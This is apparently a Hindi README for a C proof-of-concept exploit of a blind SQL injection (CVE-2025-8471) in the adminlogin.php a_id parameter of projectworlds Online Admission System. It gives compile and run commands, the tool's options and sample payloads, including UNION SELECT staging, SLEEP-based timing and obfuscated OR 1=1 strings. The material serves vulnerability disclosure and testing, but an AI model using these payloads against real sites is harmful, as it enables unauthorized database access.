
projectworlds Online Admissions System v1.0 में SQL injection का दोहन करें
लेखक: Byte Reaper
CVE: CVE-2025-8471
कमजोरी: “projectworlds Online Admission System v1.0” में SQL इंजेक्शन
विवरण:
adminlogin.php?a_id= में एक ब्लाइंड SQL इंजेक्शन मौजूद है। यह PoC विभिन्न पेलोड—दोनों दो-चरणीय (INSERT … UNION SELECT …, SLEEP(), SELECT code …) और “डीप इंजेक्शन” स्ट्रिंग—के साथ GET अनुरोधों की एक श्रृंखला भेजता है, ताकि प्रतिक्रिया-लंबाई अंतर के माध्यम से समस्या का पता लगाया और उसकी गणना की जा सके।
सुनिश्चित करें कि आपके पास libcurl और argparse स्थापित हैं (जैसे Debian/Ubuntu पर: )।
sudo apt-get install libcurl4-openssl-devसंकलन करें:
gcc exploit.c argparse.c -o exploit -lcurl
./exploit -u <TARGET_BASE_URL> [-c cookies.txt] [-v]
-u, --url — Base URL of the target, e.g. http://vulnsite.com
-c, --cookies — (Optional) path to a cookies file to maintain session
-v, --verbose — Enable verbose libcurl output and full response dumps
./exploit -u http:// -v
यह निम्नलिखित करेगा:
/adminlogin.php पर एक सामान्य अनुरोध भेजेगा और उसकी लंबाई रिकॉर्ड करेगा।?a_id=… पर इंजेक्ट करेगा।result.log में लॉग करेगा।INSERT INTO stages (id,code) VALUES (3, 'UNION SELECT NULL --');
SELECT SLEEP(2);
SELECT code FROM stages WHERE id = 3;
'//OR//1=1--, '//OR//'a'='a'--, …
इसमें बूलियन, टाइम-आधारित, यूनियन, सबस्ट्रिंग, ऑर्डर-बाय, लाइक, एक्ज़िस्ट्स, कमेंट-स्टाइल इंजेक्शन शामिल हैं।
सभी पेलोड को वितरण से पहले curl_easy_escape के माध्यम से URL-एन्कोड किया जाता है।
MIT License